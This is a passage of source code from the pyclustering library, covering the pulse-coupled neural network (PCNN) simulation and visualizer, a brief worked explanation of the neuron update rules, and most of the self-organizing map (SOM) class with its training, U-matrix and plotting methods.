signal_vector_information = []
for t in range(0, len(self.__dynamic)):
signal_vector_information.append(sum(self.__dynamic[t]))
return signal_vector_information
class pcnn_visualizer:
"""!
@brief Visualizer of output dynamic of pulse-coupled neural network (PCNN).
"""
@staticmethod
def show_time_signal(pcnn_output_dynamic):
"""!
@brief Shows time signal (signal vector information) using network dynamic during simulation.
@param[in] pcnn_output_dynamic (pcnn_dynamic): Output dynamic of the pulse-coupled neural network.
"""
time_signal = pcnn_output_dynamic.allocate_time_signal()
time_axis = range(len(time_signal))
plt.subplot(1, 1, 1)
plt.plot(time_axis, time_signal, '-')
plt.ylabel("G (time signal)")
plt.xlabel("t (iteration)")
plt.grid(True)
plt.show()
@staticmethod
def show_output_dynamic(pcnn_output_dynamic, separate_representation = False):
"""!
@brief Shows output dynamic (output of each oscillator) during simulation.
@param[in] pcnn_output_dynamic (pcnn_dynamic): Output dynamic of the pulse-coupled neural network.
        @param[in] separate_representation (list): Consists of lists of oscillators where each such list consists of oscillator indexes that will be shown on a separate stage.
"""
figure, _ = draw_dynamics(pcnn_output_dynamic.time, pcnn_output_dynamic.output, x_title="t", y_title="y(t)", separate=separate_representation)
plt.close(figure)
@staticmethod
def animate_spike_ensembles(pcnn_output_dynamic, image_size):
"""!
@brief Shows animation of output dynamic (output of each oscillator) during simulation.
@param[in] pcnn_output_dynamic (pcnn_dynamic): Output dynamic of the pulse-coupled neural network.
@param[in] image_size (tuple): Image size represented as (height, width).
"""
figure = plt.figure()
time_signal = pcnn_output_dynamic.allocate_time_signal()
spike_ensembles = pcnn_output_dynamic.allocate_spike_ensembles()
spike_animation = []
ensemble_index = 0
for t in range(len(time_signal)):
image_color_segments = [(255, 255, 255)] * (image_size[0] * image_size[1])
if time_signal[t] > 0:
for index_pixel in spike_ensembles[ensemble_index]:
image_color_segments[index_pixel] = (0, 0, 0)
ensemble_index += 1
stage = numpy.array(image_color_segments, numpy.uint8)
            stage = numpy.reshape(stage, image_size + (3,))  # (3,) is the RGB depth - the third dimension.
image_cluster = Image.fromarray(stage, 'RGB')
spike_animation.append( [ plt.imshow(image_cluster, interpolation='none') ] )
im_ani = animation.ArtistAnimation(figure, spike_animation, interval=75, repeat_delay=3000, blit=True)
plt.show()
plt.close(figure)
class pcnn_network(network):
"""!
@brief Model of oscillatory network that is based on the Eckhorn model.
@details CCORE option can be used to use the pyclustering core - C/C++ shared library for processing that significantly increases performance.
Here is an example how to perform PCNN simulation:
@code
from pyclustering.nnet.pcnn import pcnn_network, pcnn_visualizer
# Create Pulse-Coupled neural network with 10 oscillators.
net = pcnn_network(10)
# Perform simulation during 100 steps using binary external stimulus.
dynamic = net.simulate(50, [1, 1, 1, 0, 0, 0, 0, 1, 1, 1])
# Allocate synchronous ensembles from the output dynamic.
ensembles = dynamic.allocate_sync_ensembles()
# Show output dynamic.
pcnn_visualizer.show_output_dynamic(dynamic, ensembles)
@endcode
"""
__OUTPUT_TRUE = 1 # fire value for oscillators.
__OUTPUT_FALSE = 0 # rest value for oscillators.
def __init__(self, num_osc, parameters=None, type_conn=conn_type.ALL_TO_ALL, type_conn_represent=conn_represent.MATRIX, height=None, width=None, ccore=True):
"""!
        @brief Constructor of the oscillatory network based on the Eckhorn model.
@param[in] num_osc (uint): Number of oscillators in the network.
@param[in] parameters (pcnn_parameters): Parameters of the network.
@param[in] type_conn (conn_type): Type of connection between oscillators in the network (all-to-all, grid, bidirectional list, etc.).
@param[in] type_conn_represent (conn_represent): Internal representation of connection in the network: matrix or list.
@param[in] height (uint): Number of oscillators in column of the network, this argument is used
only for network with grid structure (GRID_FOUR, GRID_EIGHT), for other types this argument is ignored.
        @param[in] width (uint): Number of oscillators in row of the network, this argument is used only
for network with grid structure (GRID_FOUR, GRID_EIGHT), for other types this argument is ignored.
@param[in] ccore (bool): If True then all interaction with object will be performed via CCORE library (C++ implementation of pyclustering).
"""
self._outputs = None # list of outputs of oscillators.
self._feeding = None # feeding compartment of each oscillator.
self._linking = None # linking compartment of each oscillator.
self._threshold = None # threshold of each oscillator.
self._params = None
self.__ccore_pcnn_pointer = None
# set parameters of the network
if parameters is not None:
self._params = parameters
else:
self._params = pcnn_parameters()
if (ccore is True) and ccore_library.workable():
network_height = height
network_width = width
if (type_conn == conn_type.GRID_FOUR) or (type_conn == conn_type.GRID_EIGHT):
if (network_height is None) or (network_width is None):
side_size = num_osc ** (0.5)
if side_size - math.floor(side_size) > 0:
raise NameError('Invalid number of oscillators in the network in case of grid structure')
network_height = int(side_size)
network_width = int(side_size)
else:
network_height = 0
network_width = 0
self.__ccore_pcnn_pointer = wrapper.pcnn_create(num_osc, type_conn, network_height, network_width, self._params)
else:
super().__init__(num_osc, type_conn, type_conn_represent, height, width)
self._outputs = [0.0] * self._num_osc
self._feeding = [0.0] * self._num_osc
self._linking = [0.0] * self._num_osc
self._threshold = [ random.random() for i in range(self._num_osc) ]
def __del__(self):
"""!
@brief Default destructor of PCNN.
"""
if self.__ccore_pcnn_pointer is not None:
wrapper.pcnn_destroy(self.__ccore_pcnn_pointer)
self.__ccore_pcnn_pointer = None
def __len__(self):
"""!
@brief (uint) Returns size of oscillatory network.
"""
if self.__ccore_pcnn_pointer is not None:
return wrapper.pcnn_get_size(self.__ccore_pcnn_pointer)
return self._num_osc
def simulate(self, steps, stimulus):
"""!
        @brief Performs static simulation of the pulse-coupled neural network.
        @param[in] steps (uint): Number of steps of the simulation.
@param[in] stimulus (list): Stimulus for oscillators, number of stimulus should be equal to number of oscillators.
@return (pcnn_dynamic) Dynamic of oscillatory network - output of each oscillator on each step of simulation.
"""
if len(stimulus) != len(self):
            raise NameError('Number of stimulus should be equal to number of oscillators. Each stimulus corresponds to only one oscillator.')
if self.__ccore_pcnn_pointer is not None:
ccore_instance_dynamic = wrapper.pcnn_simulate(self.__ccore_pcnn_pointer, steps, stimulus)
return pcnn_dynamic(None, ccore_instance_dynamic)
dynamic = []
dynamic.append(self._outputs)
for step in range(1, steps, 1):
self._outputs = self._calculate_states(stimulus)
dynamic.append(self._outputs)
return pcnn_dynamic(dynamic)
def _calculate_states(self, stimulus):
"""!
        @brief Calculates states of oscillators in the network for the current step and stores them, except for the outputs of oscillators.
@param[in] stimulus (list): Stimulus for oscillators, number of stimulus should be equal to number of oscillators.
        @return (list) New outputs of the oscillators (not stored by this method).
"""
feeding = [0.0] * self._num_osc
linking = [0.0] * self._num_osc
outputs = [0.0] * self._num_osc
threshold = [0.0] * self._num_osc
for index in range(0, self._num_osc, 1):
neighbors = self.get_neighbors(index)
feeding_influence = 0.0
linking_influence = 0.0
for index_neighbour in neighbors:
feeding_influence += self._outputs[index_neighbour] * self._params.M
linking_influence += self._outputs[index_neighbour] * self._params.W
feeding_influence *= self._params.VF
linking_influence *= self._params.VL
feeding[index] = self._params.AF * self._feeding[index] + stimulus[index] + feeding_influence
linking[index] = self._params.AL * self._linking[index] + linking_influence
# calculate internal activity
internal_activity = feeding[index] * (1.0 + self._params.B * linking[index])
# calculate output of the oscillator
if internal_activity > self._threshold[index]:
outputs[index] = self.__OUTPUT_TRUE
else:
outputs[index] = self.__OUTPUT_FALSE
# In case of Fast Linking we should calculate threshold until output is changed.
if self._params.FAST_LINKING is not True:
threshold[index] = self._params.AT * self._threshold[index] + self._params.VT * outputs[index]
# In case of Fast Linking we need to wait until output is changed.
if self._params.FAST_LINKING is True:
            output_change = True  # Set to True for the first iteration.
previous_outputs = outputs[:]
while output_change is True:
current_output_change = False
for index in range(0, self._num_osc, 1):
linking_influence = 0.0
neighbors = self.get_neighbors(index)
for index_neighbour in neighbors:
linking_influence += previous_outputs[index_neighbour] * self._params.W
linking_influence *= self._params.VL
linking[index] = linking_influence
internal_activity = feeding[index] * (1.0 + self._params.B * linking[index])
# calculate output of the oscillator
if internal_activity > self._threshold[index]:
outputs[index] = self.__OUTPUT_TRUE
else:
outputs[index] = self.__OUTPUT_FALSE
current_output_change |= (outputs[index] != previous_outputs[index])
output_change = current_output_change
if output_change is True:
previous_outputs = outputs[:]
# In case of Fast Linking threshold should be calculated after fast linking.
if self._params.FAST_LINKING is True:
for index in range(0, self._num_osc, 1):
threshold[index] = self._params.AT * self._threshold[index] + self._params.VT * outputs[index]
self._feeding = feeding[:]
self._linking = linking[:]
self._threshold = threshold[:]
return outputs
```
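The per-neuron update in `_calculate_states` reduces to three recurrences: F(t) = AF·F(t-1) + S + VF·M·Σy, L(t) = AL·L(t-1) + VL·W·Σy, U(t) = F(t)·(1 + B·L(t)), with y(t) = 1 if U(t) > T(t-1) and T(t) = AT·T(t-1) + VT·y(t). A hand-worked sketch for one isolated neuron with the default parameters (the zero initial threshold is an assumption; the network actually draws it randomly):
```python
# One isolated PCNN neuron (no neighbors) under constant stimulus, using the
# default pcnn_parameters values from above. The neuron fires, the threshold
# jumps by VT, then decays by factor AT until the neuron fires again.
AF, AL, B, AT, VT = 0.1, 0.1, 0.1, 0.5, 10.0
stimulus = 1.0

feeding, linking, threshold = 0.0, 0.0, 0.0   # assumption: threshold starts at 0
for step in range(6):
    feeding = AF * feeding + stimulus          # no neighbor influence
    linking = AL * linking                     # no neighbor influence
    activity = feeding * (1.0 + B * linking)
    output = 1 if activity > threshold else 0
    threshold = AT * threshold + VT * output
    print(step, round(activity, 4), output, round(threshold, 4))
```
This traces the periodic firing behavior: the neuron spikes on the first step, the threshold jumps to 10, and subsequent steps decay it by half until internal activity exceeds it again.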
#### File: pyclustering/nnet/som.py
```python
import math
import random
import matplotlib.pyplot as plt
import pyclustering.core.som_wrapper as wrapper
from pyclustering.core.wrapper import ccore_library
from pyclustering.utils import euclidean_distance_square
from pyclustering.utils.dimension import dimension_info
from enum import IntEnum
class type_conn(IntEnum):
"""!
@brief Enumeration of connection types for SOM.
@see som
"""
## Grid type of connections when each oscillator has connections with left, upper, right, lower neighbors.
grid_four = 0
## Grid type of connections when each oscillator has connections with left, upper-left, upper, upper-right, right, right-lower, lower, lower-left neighbors.
grid_eight = 1
## Grid type of connections when each oscillator has connections with left, upper-left, upper-right, right, right-lower, lower-left neighbors.
honeycomb = 2
## Grid type of connections when existance of each connection is defined by the SOM rule on each step of simulation.
func_neighbor = 3
class type_init(IntEnum):
"""!
@brief Enumeration of initialization types for SOM.
@see som
"""
## Weights are randomly distributed using Gaussian distribution (0, 1).
random = 0
## Weights are randomly distributed using Gaussian distribution (input data centroid, 1).
random_centroid = 1
    ## Weights are randomly distributed using Gaussian distribution (input data centroid, surface of input data).
random_surface = 2
## Weights are distributed as a uniform grid that covers whole surface of the input data.
uniform_grid = 3
class som_parameters:
"""!
@brief Represents SOM parameters.
"""
def __init__(self):
"""!
@brief Creates SOM parameters.
"""
        ## Defines an initialization way for neuron weights (random, random in center of the input data, random distributed in data, distributed in line with uniform grid).
self.init_type = type_init.uniform_grid
## Initial radius. If the initial radius is not specified (equals to `None`) then it will be calculated by SOM.
self.init_radius = None
## Rate of learning.
self.init_learn_rate = 0.1
        ## Condition that defines when the learning process should be stopped. It is used when the autostop mode is on.
self.adaptation_threshold = 0.001
## Seed for random state (by default is `None`, current system time is used).
self.random_state = None
class som:
"""!
@brief Represents self-organized feature map (SOM).
@details The self-organizing feature map (SOM) method is a powerful tool for the visualization of
    high-dimensional data. It converts complex, nonlinear statistical relationships between
high-dimensional data into simple geometric relationships on a low-dimensional display.
@details `ccore` option can be specified in order to control using C++ implementation of pyclustering library. By
default C++ implementation is on. C++ implementation improves performance of the self-organized feature
map.
Example:
@code
import random
from pyclustering.utils import read_sample
from pyclustering.nnet.som import som, type_conn, type_init, som_parameters
from pyclustering.samples.definitions import FCPS_SAMPLES
# read sample 'Lsun' from file
sample = read_sample(FCPS_SAMPLES.SAMPLE_LSUN)
# create SOM parameters
parameters = som_parameters()
    # create self-organized feature map with size 10x10
    rows = 10  # ten rows
    cols = 10  # ten columns
    structure = type_conn.grid_four  # each neuron has max. four neighbors.
network = som(rows, cols, structure, parameters)
    # train network on 'Lsun' sample during 100 epochs.
network.train(sample, 100)
# simulate trained network using randomly modified point from input dataset.
index_point = random.randint(0, len(sample) - 1)
point = sample[index_point] # obtain randomly point from data
point[0] += random.random() * 0.2 # change randomly X-coordinate
point[1] += random.random() * 0.2 # change randomly Y-coordinate
index_winner = network.simulate(point)
    # check which objects from the input data are closest to the randomly modified point.
index_similar_objects = network.capture_objects[index_winner]
# neuron contains information of encoded objects
print("Point '%s' is similar to objects with indexes '%s'." % (str(point), str(index_similar_objects)))
print("Coordinates of similar objects:")
for index in index_similar_objects: print("\tPoint:", sample[index])
# result visualization:
# show distance matrix (U-matrix).
network.show_distance_matrix()
# show density matrix (P-matrix).
network.show_density_matrix()
# show winner matrix.
network.show_winner_matrix()
# show self-organized map.
network.show_network()
@endcode
There is a visualization of 'Target' sample that was done by the self-organized feature map:
@image html target_som_processing.png
"""
@property
def size(self):
"""!
@brief Return size of self-organized map that is defined by total number of neurons.
@return (uint) Size of self-organized map (number of neurons).
"""
if self.__ccore_som_pointer is not None:
self._size = wrapper.som_get_size(self.__ccore_som_pointer)
return self._size
@property
def weights(self):
"""!
@brief Return weight of each neuron.
@return (list) Weights of each neuron.
"""
if self.__ccore_som_pointer is not None:
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
return self._weights
@property
def awards(self):
"""!
@brief Return amount of captured objects by each neuron after training.
@return (list) Amount of captured objects by each neuron.
@see train()
"""
if self.__ccore_som_pointer is not None:
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
return self._award
@property
def capture_objects(self):
"""!
@brief Returns indexes of captured objects by each neuron.
@details For example, a network with size 2x2 has been trained on a sample with five objects. Suppose neuron #1
        won an object with index `1`, neuron #2 won objects `0`, `3`, `4`, neuron #3 did not win anything and
finally neuron #4 won an object with index `2`. Thus, for this example we will have the following
output `[[1], [0, 3, 4], [], [2]]`.
@return (list) Indexes of captured objects by each neuron.
"""
if self.__ccore_som_pointer is not None:
self._capture_objects = wrapper.som_get_capture_objects(self.__ccore_som_pointer)
return self._capture_objects
def __init__(self, rows, cols, conn_type=type_conn.grid_eight, parameters=None, ccore=True):
"""!
@brief Constructor of self-organized map.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
@param[in] conn_type (type_conn): Type of connection between oscillators in the network (grid four, grid eight, honeycomb, function neighbour).
@param[in] parameters (som_parameters): Other specific parameters.
@param[in] ccore (bool): If True simulation is performed by CCORE library (C++ implementation of pyclustering).
"""
# some of these parameters are required despite core implementation, for example, for network visualization.
self._cols = cols
self._rows = rows
self._size = cols * rows
self._conn_type = conn_type
self._data = None
self._neighbors = None
self._local_radius = 0.0
self._learn_rate = 0.0
self.__ccore_som_pointer = None
self._params = parameters or som_parameters()
if self._params.init_radius is None:
self._params.init_radius = self.__initialize_initial_radius(rows, cols)
if (ccore is True) and ccore_library.workable():
self.__ccore_som_pointer = wrapper.som_create(rows, cols, conn_type, self._params)
else:
# location
self._location = self.__initialize_locations(rows, cols)
# default weights
self._weights = [[0.0]] * self._size
# awards
self._award = [0] * self._size
# captured objects
self._capture_objects = [[] for i in range(self._size)]
# distances - calculate and store them only during training
self._sqrt_distances = None
# connections
if conn_type != type_conn.func_neighbor:
self._create_connections(conn_type)
def __del__(self):
"""!
@brief Destructor of the self-organized feature map.
"""
if self.__ccore_som_pointer is not None:
wrapper.som_destroy(self.__ccore_som_pointer)
def __len__(self):
"""!
        @brief Returns size of the network that is defined by the amount of neurons in it.
@return (uint) Size of self-organized map (amount of neurons).
"""
return self._size
def __getstate__(self):
"""
@brief Returns state of SOM network that can be used to store network.
"""
if self.__ccore_som_pointer is not None:
self.__download_dump_from_ccore()
return self.__get_dump_from_python(True)
return self.__get_dump_from_python(False)
def __setstate__(self, som_state):
"""
@brief Set state of SOM network that can be used to load network.
"""
if som_state['ccore'] is True and ccore_library.workable():
self.__upload_dump_to_ccore(som_state['state'])
else:
self.__upload_dump_to_python(som_state['state'])
def __initialize_initial_radius(self, rows, cols):
"""!
@brief Initialize initial radius using map sizes.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
        @return (double) Value of initial radius.
"""
if (cols + rows) / 4.0 > 1.0:
return 2.0
elif (cols > 1) and (rows > 1):
return 1.5
else:
return 1.0
def __initialize_locations(self, rows, cols):
"""!
@brief Initialize locations (coordinates in SOM grid) of each neurons in the map.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
@return (list) List of coordinates of each neuron in map.
"""
location = list()
for i in range(rows):
for j in range(cols):
location.append([float(i), float(j)])
return location
def __initialize_distances(self, size, location):
"""!
@brief Initialize distance matrix in SOM grid.
@param[in] size (uint): Amount of neurons in the network.
@param[in] location (list): List of coordinates of each neuron in the network.
@return (list) Distance matrix between neurons in the network.
"""
sqrt_distances = [[[] for i in range(size)] for j in range(size)]
for i in range(size):
for j in range(i, size, 1):
dist = euclidean_distance_square(location[i], location[j])
sqrt_distances[i][j] = dist
sqrt_distances[j][i] = dist
return sqrt_distances
def _create_initial_weights(self, init_type):
"""!
@brief Creates initial weights for neurons in line with the specified initialization.
        @param[in] init_type (type_init): Type of initialization of initial neuron weights (random, random in center of the input data, random distributed in data, distributed in line with uniform grid).
"""
dim_info = dimension_info(self._data)
step_x = dim_info.get_center()[0]
if self._rows > 1:
step_x = dim_info.get_width()[0] / (self._rows - 1)
step_y = 0.0
if dim_info.get_dimensions() > 1:
step_y = dim_info.get_center()[1]
if self._cols > 1:
step_y = dim_info.get_width()[1] / (self._cols - 1)
# generate weights (topological coordinates)
random.seed(self._params.random_state)
# Uniform grid.
if init_type == type_init.uniform_grid:
# Predefined weights in line with input data.
self._weights = [[[] for i in range(dim_info.get_dimensions())] for j in range(self._size)]
for i in range(self._size):
location = self._location[i]
for dim in range(dim_info.get_dimensions()):
if dim == 0:
if self._rows > 1:
self._weights[i][dim] = dim_info.get_minimum_coordinate()[dim] + step_x * location[dim]
else:
self._weights[i][dim] = dim_info.get_center()[dim]
elif dim == 1:
if self._cols > 1:
self._weights[i][dim] = dim_info.get_minimum_coordinate()[dim] + step_y * location[dim]
else:
self._weights[i][dim] = dim_info.get_center()[dim]
else:
self._weights[i][dim] = dim_info.get_center()[dim]
elif init_type == type_init.random_surface:
# Random weights at the full surface.
self._weights = [
[random.uniform(dim_info.get_minimum_coordinate()[i], dim_info.get_maximum_coordinate()[i]) for i in
range(dim_info.get_dimensions())] for _ in range(self._size)]
elif init_type == type_init.random_centroid:
# Random weights at the center of input data.
self._weights = [[(random.random() + dim_info.get_center()[i]) for i in range(dim_info.get_dimensions())]
for _ in range(self._size)]
else:
# Random weights of input data.
self._weights = [[random.random() for i in range(dim_info.get_dimensions())] for _ in range(self._size)]
def _create_connections(self, conn_type):
"""!
@brief Create connections in line with input rule (grid four, grid eight, honeycomb, function neighbour).
@param[in] conn_type (type_conn): Type of connection between oscillators in the network.
"""
self._neighbors = [[] for index in range(self._size)]
for index in range(0, self._size, 1):
upper_index = index - self._cols
upper_left_index = index - self._cols - 1
upper_right_index = index - self._cols + 1
lower_index = index + self._cols
lower_left_index = index + self._cols - 1
lower_right_index = index + self._cols + 1
left_index = index - 1
right_index = index + 1
node_row_index = math.floor(index / self._cols)
upper_row_index = node_row_index - 1
lower_row_index = node_row_index + 1
if (conn_type == type_conn.grid_eight) or (conn_type == type_conn.grid_four):
if upper_index >= 0:
self._neighbors[index].append(upper_index)
if lower_index < self._size:
self._neighbors[index].append(lower_index)
if (conn_type == type_conn.grid_eight) or (conn_type == type_conn.grid_four) or (
conn_type == type_conn.honeycomb):
if (left_index >= 0) and (math.floor(left_index / self._cols) == node_row_index):
self._neighbors[index].append(left_index)
if (right_index < self._size) and (math.floor(right_index / self._cols) == node_row_index):
self._neighbors[index].append(right_index)
if conn_type == type_conn.grid_eight:
if (upper_left_index >= 0) and (math.floor(upper_left_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_left_index)
if (upper_right_index >= 0) and (math.floor(upper_right_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_right_index)
if (lower_left_index < self._size) and (math.floor(lower_left_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_left_index)
if (lower_right_index < self._size) and (math.floor(lower_right_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_right_index)
if conn_type == type_conn.honeycomb:
if (node_row_index % 2) == 0:
upper_left_index = index - self._cols
upper_right_index = index - self._cols + 1
lower_left_index = index + self._cols
lower_right_index = index + self._cols + 1
else:
upper_left_index = index - self._cols - 1
upper_right_index = index - self._cols
lower_left_index = index + self._cols - 1
lower_right_index = index + self._cols
if (upper_left_index >= 0) and (math.floor(upper_left_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_left_index)
if (upper_right_index >= 0) and (math.floor(upper_right_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_right_index)
if (lower_left_index < self._size) and (math.floor(lower_left_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_left_index)
if (lower_right_index < self._size) and (math.floor(lower_right_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_right_index)
def _competition(self, x):
"""!
        @brief Calculates the winner neuron - the neuron whose weights are closest to the input pattern.
@param[in] x (list): Input pattern from the input data set, for example it can be coordinates of point.
@return (uint) Returns index of neuron that is winner.
"""
index = 0
minimum = euclidean_distance_square(self._weights[0], x)
for i in range(1, self._size, 1):
candidate = euclidean_distance_square(self._weights[i], x)
if candidate < minimum:
index = i
minimum = candidate
return index
def _adaptation(self, index, x):
"""!
@brief Change weight of neurons in line with won neuron.
@param[in] index (uint): Index of neuron-winner.
@param[in] x (list): Input pattern from the input data set.
"""
dimension = len(self._weights[0])
if self._conn_type == type_conn.func_neighbor:
for neuron_index in range(self._size):
distance = self._sqrt_distances[index][neuron_index]
if distance < self._local_radius:
influence = math.exp(-(distance / (2.0 * self._local_radius)))
for i in range(dimension):
self._weights[neuron_index][i] = self._weights[neuron_index][
i] + self._learn_rate * influence * (
x[i] - self._weights[neuron_index][i])
else:
for i in range(dimension):
self._weights[index][i] = self._weights[index][i] + self._learn_rate * (x[i] - self._weights[index][i])
for neighbor_index in self._neighbors[index]:
distance = self._sqrt_distances[index][neighbor_index]
if distance < self._local_radius:
influence = math.exp(-(distance / (2.0 * self._local_radius)))
for i in range(dimension):
self._weights[neighbor_index][i] = self._weights[neighbor_index][
i] + self._learn_rate * influence * (
x[i] - self._weights[neighbor_index][i])
def train(self, data, epochs, autostop=False):
"""!
@brief Trains self-organized feature map (SOM).
@param[in] data (list): Input data - list of points where each point is represented by list of features, for example coordinates.
@param[in] epochs (uint): Number of epochs for training.
        @param[in] autostop (bool): Automatic termination of the learning process when adaptation no longer occurs.
@return (uint) Number of learning iterations.
"""
self._data = data
if self.__ccore_som_pointer is not None:
return wrapper.som_train(self.__ccore_som_pointer, data, epochs, autostop)
self._sqrt_distances = self.__initialize_distances(self._size, self._location)
for i in range(self._size):
self._award[i] = 0
self._capture_objects[i].clear()
# weights
self._create_initial_weights(self._params.init_type)
previous_weights = None
for epoch in range(1, epochs + 1):
# Depression term of coupling
self._local_radius = (self._params.init_radius * math.exp(-(epoch / epochs))) ** 2
self._learn_rate = self._params.init_learn_rate * math.exp(-(epoch / epochs))
# Clear statistics
if autostop:
for i in range(self._size):
self._award[i] = 0
self._capture_objects[i].clear()
for i in range(len(self._data)):
# Step 1: Competition:
index = self._competition(self._data[i])
# Step 2: Adaptation:
self._adaptation(index, self._data[i])
# Update statistics
if (autostop is True) or (epoch == epochs):
self._award[index] += 1
self._capture_objects[index].append(i)
# Check requirement of stopping
if autostop:
if previous_weights is not None:
maximal_adaptation = self._get_maximal_adaptation(previous_weights)
if maximal_adaptation < self._params.adaptation_threshold:
return epoch
previous_weights = [item[:] for item in self._weights]
return epochs
def simulate(self, input_pattern):
"""!
        @brief Processes input pattern (no learning) and returns index of the winner neuron.
        Using the index of the winner neuron, the captured objects can be obtained via the capture_objects property.
@param[in] input_pattern (list): Input pattern.
@return (uint) Returns index of neuron-winner.
@see capture_objects
"""
if self.__ccore_som_pointer is not None:
return wrapper.som_simulate(self.__ccore_som_pointer, input_pattern)
return self._competition(input_pattern)
def _get_maximal_adaptation(self, previous_weights):
"""!
@brief Calculates maximum changes of weight in line with comparison between previous weights and current weights.
@param[in] previous_weights (list): Weights from the previous step of learning process.
@return (double) Value that represents maximum changes of weight after adaptation process.
"""
dimension = len(self._data[0])
maximal_adaptation = 0.0
for neuron_index in range(self._size):
for dim in range(dimension):
current_adaptation = previous_weights[neuron_index][dim] - self._weights[neuron_index][dim]
if current_adaptation < 0:
current_adaptation = -current_adaptation
if maximal_adaptation < current_adaptation:
maximal_adaptation = current_adaptation
return maximal_adaptation
def get_winner_number(self):
"""!
        @brief Calculates the number of winners at the last step of the learning process.
        @return (uint) Number of winners.
"""
if self.__ccore_som_pointer is not None:
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
winner_number = 0
for i in range(self._size):
if self._award[i] > 0:
winner_number += 1
return winner_number
def show_distance_matrix(self):
"""!
@brief Shows gray visualization of U-matrix (distance matrix).
@see get_distance_matrix()
"""
distance_matrix = self.get_distance_matrix()
plt.imshow(distance_matrix, cmap=plt.get_cmap('hot'), interpolation='kaiser')
plt.title("U-Matrix")
plt.colorbar()
plt.show()
def get_distance_matrix(self):
"""!
@brief Calculates distance matrix (U-matrix).
        @details Each U-Matrix cell is the average squared distance in the input space between a neuron's weight vector and the weight vectors of its neighbors on the map.
@return (list) Distance matrix (U-matrix).
@see show_distance_matrix()
@see get_density_matrix()
"""
if self.__ccore_som_pointer is not None:
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
if self._conn_type != type_conn.func_neighbor:
self._neighbors = wrapper.som_get_neighbors(self.__ccore_som_pointer)
        if self._conn_type == type_conn.func_neighbor:
            self._create_connections(type_conn.grid_eight)
        distance_matrix = [[0.0] * self._cols for _ in range(self._rows)]
        for i in range(self._rows):
            for j in range(self._cols):
                neuron_index = i * self._cols + j
                for neighbor_index in self._neighbors[neuron_index]:
                    distance_matrix[i][j] += euclidean_distance_square(self._weights[neuron_index],
                                                                       self._weights[neighbor_index])
                distance_matrix[i][j] /= len(self._neighbors[neuron_index])
return distance_matrix
def show_density_matrix(self, surface_divider=20.0):
"""!
@brief Show density matrix (P-matrix) using kernel density estimation.
        @param[in] surface_divider (double): Divider in each dimension that affects the radius used for the density measurement.
@see show_distance_matrix()
"""
density_matrix = self.get_density_matrix(surface_divider)
plt.imshow(density_matrix, cmap=plt.get_cmap('hot'), interpolation='kaiser')
plt.title("P-Matrix")
plt.colorbar()
plt.show()
def get_density_matrix(self, surface_divider=20.0):
"""!
@brief Calculates density matrix (P-Matrix).
        @param[in] surface_divider (double): Divider in each dimension that affects the radius used for the density measurement.
@return (list) Density matrix (P-Matrix).
@see get_distance_matrix()
"""
if self.__ccore_som_pointer is not None:
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
density_matrix = [[0] * self._cols for i in range(self._rows)]
dimension = len(self._weights[0])
dim_max = [float('-Inf')] * dimension
dim_min = [float('Inf')] * dimension
for weight in self._weights:
for index_dim in range(dimension):
if weight[index_dim] > dim_max[index_dim]:
dim_max[index_dim] = weight[index_dim]
if weight[index_dim] < dim_min[index_dim]:
dim_min[index_dim] = weight[index_dim]
radius = [0.0] * len(self._weights[0])
for index_dim in range(dimension):
radius[index_dim] = (dim_max[index_dim] - dim_min[index_dim]) / surface_divider
## TODO: do not use data
for point in self._data:
for index_neuron in range(len(self)):
point_covered = True
for index_dim in range(dimension):
if abs(point[index_dim] - self._weights[index_neuron][index_dim]) > radius[index_dim]:
point_covered = False
break
row = int(math.floor(index_neuron / self._cols))
col = index_neuron - row * self._cols
if point_covered is True:
density_matrix[row][col] += 1
return density_matrix
def show_winner_matrix(self):
"""!
        @brief Shows a winner matrix where each element corresponds to a neuron and the value represents
        the number of objects captured from the input data space at the last training iteration.
@see show_distance_matrix()
"""
if self.__ccore_som_pointer is not None:
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
(fig, ax) = plt.subplots()
winner_matrix = [[0] * self._cols for _ in range(self._rows)]
for i in range(self._rows):
for j in range(self._cols):
neuron_index = i * self._cols + j
winner_matrix[i][j] = self._award[neuron_index]
                ax.text(j, i, str(winner_matrix[i][j]), va='center', ha='center')  # for imshow, x is the column and y is the row
ax.imshow(winner_matrix, cmap=plt.get_cmap('cool'), interpolation='none')
ax.grid(True)
plt.title("Winner Matrix")
plt.show()
plt.close(fig)
def show_network(self, awards=False, belongs=False, coupling=True, dataset=True, marker_type='o'):
"""!
@brief Shows neurons in the dimension of data.
@param[in] awards (bool): If True - displays how many objects won each neuron.
        @param[in] belongs (bool): If True - marks each captured object with the index of its winning neuron (only when
                   the dataset is displayed too).
@param[in] coupling (bool): If True - displays connections between neurons (except case when function neighbor
is used).
@param[in] dataset (bool): If True - displays inputs data set.
@param[in] marker_type (string): Defines marker that is used to denote neurons on the plot.
"""
if self.__ccore_som_pointer is not None:
self._size = wrapper.som_get_size(self.__ccore_som_pointer)
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
self._neighbors = wrapper.som_get_neighbors(self.__ccore_som_pointer)
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
dimension = len(self._weights[0])
fig = plt.figure()
# Check for dimensions
if (dimension == 1) or (dimension == 2):
axes = fig.add_subplot(111)
elif dimension == 3:
            axes = fig.add_subplot(111, projection='3d')  # fig.gca(projection=...) was removed in matplotlib 3.6
else:
            raise NotImplementedError('Cannot show network in a data space other than 1D, 2D or 3D.')
if (self._data is not None) and (dataset is True):
for x in self._data:
if dimension == 1:
axes.plot(x[0], 0.0, 'b|', ms=30)
elif dimension == 2:
